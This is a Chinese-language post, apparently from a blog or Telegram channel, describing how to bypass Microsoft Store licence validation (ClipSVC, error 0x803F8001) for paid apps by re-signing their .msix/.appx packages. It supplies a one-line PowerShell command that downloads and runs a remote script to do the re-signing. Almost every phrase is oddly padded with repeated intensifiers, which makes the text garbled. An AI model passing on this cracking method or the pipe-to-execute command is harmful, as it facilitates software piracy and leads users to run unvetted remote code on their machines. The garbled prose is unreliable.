这极其极其极其庞大的微软帝国,底层的代码逻辑有时候真的是极其极其极其拉胯的草台班子!
我之前极其极其极其良心地分享过一个极其极其极其强大的抓取解析网站,可以极其极其极其硬核地绕过微软商店 (Microsoft Store) 的前端,直接在系统底层把应用的原始安装包下载下来。 (极其极其极其经典的前置抓包神器:[🔗 https://t.me/ZGQincLiqun/3325]) 但是!如果你极其极其极其贪婪地用它去下载了那些极其极其极其昂贵的付费应用,当你极其极其极其兴奋地在本地双击安装完打开时,系统会极其极其极其恶心地甩给你一个极其极其极其致命的错误提示:
xxxx 目前在你的帐户中不可用。请确保你已登录到 Microsoft Store,然后重试。如果需要,可以使用以下错误代码:
0x803F8001
我极其极其极其不信邪,极其极其极其硬核地翻阅了极其海量的底层逆向文档,终于极其极其极其震撼地发现:
这个极其极其极其恶心的离线数字版权验证流程,是由系统极其底层的一个叫做 ClipSVC 的极其极其极其极其脑残的服务来完成的。
极其极其极其致命的逻辑漏洞在于:这个极其极其极其弱智的 ClipSVC 进程,它竟然只去极其极其极其死板地检查那些带有“极其极其极其纯正的微软商店官方签名”的应用!如果你作为一个极客,极其极其极其胆大包天地用极其极其极其高级的第三方开发者证书,对那个付费安装包进行一次极其极其极其彻底的底层重签名 (Re-sign),它竟然就会极其极其极其愚蠢地认为这是一个你正在开发的极其极其极其合法的侧载测试应用,从而极其极其极其完全地放弃对它的版权校验!
我直接极其极其极其暴躁地用 PowerShell 撸了一个极其极其极其自动化的底层重签名脚本。
你只需要极其极其极其简单地在终端里执行这极其极其极其简短的一行极其极其极其恐怖的命令:
1
irm "https://appx.zgqinc.gq/sign.ps1" | iex
极其极其极其硬核的运行原理:
- 它会自动极其极其极其精准地遍历当前目录下所有的极其极其极其复杂的底层打包格式,包括极其极其极其庞大的
.msix、.appx、.msixbundle、.appxbundle。 - 它极其极其极其智能地识别你当前的系统架构是极其极其极其主流的
x64、极其极其极其古老的x86、还是极其极其极其小众的arm64。 - 然后它会极其极其极其自动地去底层极其极其极其精准地下载并调用对应的极其极其极其专业的
makeappx等 SDK 工具链。 - 极其极其极其瞬间完成对应用的强行底层重签名!直接极其极其极其优雅地完成“破解”!
⚠️ 极其极其极其残酷的极客免责提醒: 这种极其极其极其底层的重签名骗术,只能极其极其极其有效地绕过系统级别的
ClipSVC外部校验。如果你极其极其极其天真地去破解像极其极其极其出名的《Minecraft (我的世界)》这种游戏,那是极其极其极其不可能成功的。因为这种极具防御性的极其极其极其顶级的游戏,它的代码内部还极其极其极其恶毒地包含着它自家极其极其极其坚固的二次内部 License 强校验极其极其极其复杂的逻辑树。